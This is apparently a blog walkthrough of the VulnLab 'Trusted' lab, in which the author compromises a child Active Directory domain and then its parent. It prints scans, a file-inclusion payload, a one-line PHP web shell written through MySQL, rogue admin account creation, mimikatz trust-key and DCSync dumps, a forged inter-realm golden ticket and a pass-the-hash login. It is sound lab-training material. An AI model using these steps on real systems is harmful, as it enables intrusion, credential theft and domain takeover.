Where Notes Work
TRUSTED – VULNLAB
This is the Write-up/Walkthrough of the TRUSTED Chain Machine from VULNLAB.
This machine is a Chain of two machines one Child domain and a Parent domain.
NMAP SCAN for PARENT Domain: 10.10.133.229
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-08-12 13:19:27Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| ssl-cert: Subject: commonName=trusteddc.trusted.vl
| Issuer: commonName=trusteddc.trusted.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
SNIP
| rdp-ntlm-info:
| Target_Name: TRUSTED
| NetBIOS_Domain_Name: TRUSTED
| NetBIOS_Computer_Name: TRUSTEDDC
| DNS_Domain_Name: trusted.vl
| DNS_Computer_Name: trusteddc.trusted.vl
| Product_Version: 10.0.20348
|_ System_Time: 2023-08-12T13:19:39+00:00
Domain: trusted.vl, BIOS NAME: TRUSTEDDC
NMAP SCAN for CHILD Domain: 10.10.133.230
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
| http-title: Welcome to XAMPP
|_Requested resource was http://10.10.151.102/dashboard/
|_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-08-12 13:11:47Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
443/tcp open ssl/http syn-ack Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3306/tcp open mysql syn-ack MySQL 5.5.5-10.4.24-MariaDB
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.4.24-MariaDB
| Thread ID: 12
| Capabilities flags: 63486
| Some Capabilities: FoundRows, SupportsCompression, LongColumnFlag, SupportsTransactions, Support41Auth, ODBCClient, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, SupportsLoadDataLocal, InteractiveClient, ConnectWithDatabase, Speaks41ProtocolNew, IgnoreSigpipes, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: ;^I3buG?E~l%mw.}NKnj
|_ Auth Plugin Name: mysql_native_password
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
|_ssl-date: 2023-08-12T13:12:08+00:00; +2s from scanner time.
| rdp-ntlm-info:
| Target_Name: LAB
| NetBIOS_Domain_Name: LAB
| NetBIOS_Computer_Name: LABDC
| DNS_Domain_Name: lab.trusted.vl
| DNS_Computer_Name: labdc.lab.trusted.vl
| DNS_Tree_Name: trusted.vl
| Product_Version: 10.0.20348
|_ System_Time: 2023-08-12T13:12:00+00:00
Domain: lab.trusted.vl, BIOS NAME: LABDC
Found CHILD Domain name: LABDC.LAB.TRUSTED.VL and PARENT Domain: TRUSTEDDC.TRUSTED.VL
Running Gobuster on Child Domain: LABDC
/aux (Status: 403) [Size: 302]
/cgi-bin/ (Status: 403) [Size: 302]
/com1 (Status: 403) [Size: 302]
/com4 (Status: 403) [Size: 302]
/com3 (Status: 403) [Size: 302]
/com2 (Status: 403) [Size: 302]
/con (Status: 403) [Size: 302]
/dashboard (Status: 301) [Size: 342] [--> http://10.10.133.230/dashboard/]
/dev (Status: 301) [Size: 336] [--> http://10.10.133.230/dev/]
/examples (Status: 503) [Size: 402]
/favicon.ico (Status: 200) [Size: 30894]
/img (Status: 301) [Size: 336] [--> http://10.10.133.230/img/]
/licenses (Status: 403) [Size: 421]
/lpt1 (Status: 403) [Size: 302]
/lpt2 (Status: 403) [Size: 302]
/nul (Status: 403) [Size: 302]
/phpmyadmin (Status: 403) [Size: 302]
/prn (Status: 403) [Size: 302]
/secci� (Status: 403) [Size: 302]
/server-info (Status: 403) [Size: 421]
/server-status (Status: 403) [Size: 421]
/webalizer (Status: 403) [Size: 302]
/xampp (Status: 301) [Size: 338] [--> http://10.10.133.230/xampp/]
Going on /dev directory found a simple website, going on ABOUT page, saw it is including the file about.html to show the content of ABOUT page, tried file disclosure vulnerability and it works, as it is Windows machine, I tried seeing hosts file and it works and shows the content of hosts file:
Payload: http://10.10.187.166/dev/index.html/view=C:\Windows\System32\drivers\etc\hosts
gobuster dir -x php -w /usr/share/wordlist/dirb/big.txt -u http://10.10.187.166/dev/
Enumerating for more files on xampp directory, found db.php file using gobuster looking for php extensions, including db.php shows connected successfully, but it was not showing the content of db.php.
To show the content of db.php, I used php filter with the following path to get the content in base64 and decoded it.
http://10.10.187.166/dev/index.html?view=php://filter/convert.base64-encode/resource=C:\xampp\htdocs\dev\db.php
After decoding the base64, found the credentials for MySQL, as port 3306 is open, and logged in using this credentials.
mysql -u root -h 10.10.187.166 -p
Enumerating for databases and tables found some users and their md5 hashes, tried decrypting all the hashes, but only Robert’s hash got decrypted, and found the password “IHateEric2”.
After that used crackmapexec to authenticate using this credential for smb, but it did not respond, looking forward, I used mysql to add a new php file to /dev directory for executing system commands.
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/dev/back.php'
Going on /dev/back.php?c=whoami, found that I have System privilege.
After that, i tried many ways to get the reverse shell but it didn’t work, so, I simply added a new user to the domain and added it to the “Administrators” group.
back.php?c=net user kunal hacker@123 /add /domain
back.php?c=net localgroup Administrators kunal /add /domain
After that used evil-winrm to connect to it, and add also user to “Domain Admins” group.
evil-winrm -u kunal -p hacker@123 -i 10.10.187.166
PS C:\Users\kunal\Documents> net group "Domain Admins" kunal /add /domain
Got Users.txt on the Administrator Desktop folder.
Looking forward, to enumerate Domain, I uploaded PowerView.ps1 using evil-winrm upload functionality and connected newly created user over RDP.
On RDP, open Powershell and imported the PowerView.ps1
. .\PowerView.ps1
OR
Import-Module .\PowerView.ps1
To pivot from Child to Parent Domain, I have to confirm that trust is bidirectional.
Enumerating for forest information, there are two forest trusted.vl which is parent, and lab.trusted.vl which is child.
Get-ForestDomain
Looking for forest trust to parent domain, Found that trust is Bidirectional.
Get-DomainTrust
As, I can see TrustDirection is Bidirectional, i can abuse this trust to get the Parent Domain, but before, I need some tool and information about the Domain.
To abuse the trust, I have to collect, SID of the Child Domain, SID of the Parent Domain and Trust key for inter-forest trust in rc4 cipher format.
Getting SID of Child and Parent Domain using PowerView module.
#for current domain, which is child domain
Get-DomainSID
#for parent domain which is trusted.vl, add -519 in last of parent SID to make it Enterprise Admin.
Get-DomainSID -Domain trusted.vl
Add -519 in root domain in last.
Retrieving inter-forest trust key as rc4 cipher, uploaded the mimikatz.exe using evil-winrm upload functionality and connected using rdp and opened cmd as administrator.
mimikatz # privilege::debug
mimikatz # lsadump::trust /patch
Copy the rc4 always from [ In ] only, and make sure to see the trust direction, I am pivoting from child to parent, so my trust direction is: [ IN] LAB.TRUSTED.VL → TRUSTED.VL
Download BetterSafetyKatz.exe from here.
After getting all the details, Using BetterSafetyKatz.exe as Administrator, to forge inter-forest TGT using the following command and saving the ticket into trust_tkt.kirbi file for later use for requesting TGS for specific services.
.\BetterSafetyKatz.exe "kerberos::golden /user:administrator /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /rc4:6bcc0ff781f2703112cd0f8f0af5763d /service:krbtgt /target:trusted.vl /ticket:C:\users\kunal\documents\trust_tkt.kirbi" "exit"
The ticket successfully got saved, using Rubues.exe as Administrator, for requesting for HTTP service using the saved ticket, for connecting to the root domain using winrm.
Rubeus.exe asktgs /ticket:trust_tkt.kirbi /service:http/trusteddc.trusted.vl /dc:trusteddc.trusted.vl /ptt
Checking the ticket using klist command.
klist
Using winrs to connect to trusteddc.trusted.vl
winrs -r:trusteddc.trusted.vl cmd
Tried, reading root.txt file but it was access denied.
After that, copied mimikatz.exe to trusteddc.trusted.vl and dump the hash of administrator.
#copying mimikatz.exe to trusteddc.trusted.vl
copy mimikatz.exe \\trusteddc.trusted.vl\c$
#dumping administrator hash
mimikatz # privilge::debug
mimikatz # lsadump::dcsync /user:trusted\administrator
After getting the hash of the administrator, used evil-winrm to pass the hash method to login in as Administrator, and read the root.txt.
evil-winrm -u administrator -H "ADMINISTRATOR-HASH-HERE" -i PARENT-DOMAIN-IP
If you face any problems, let me know in the comment.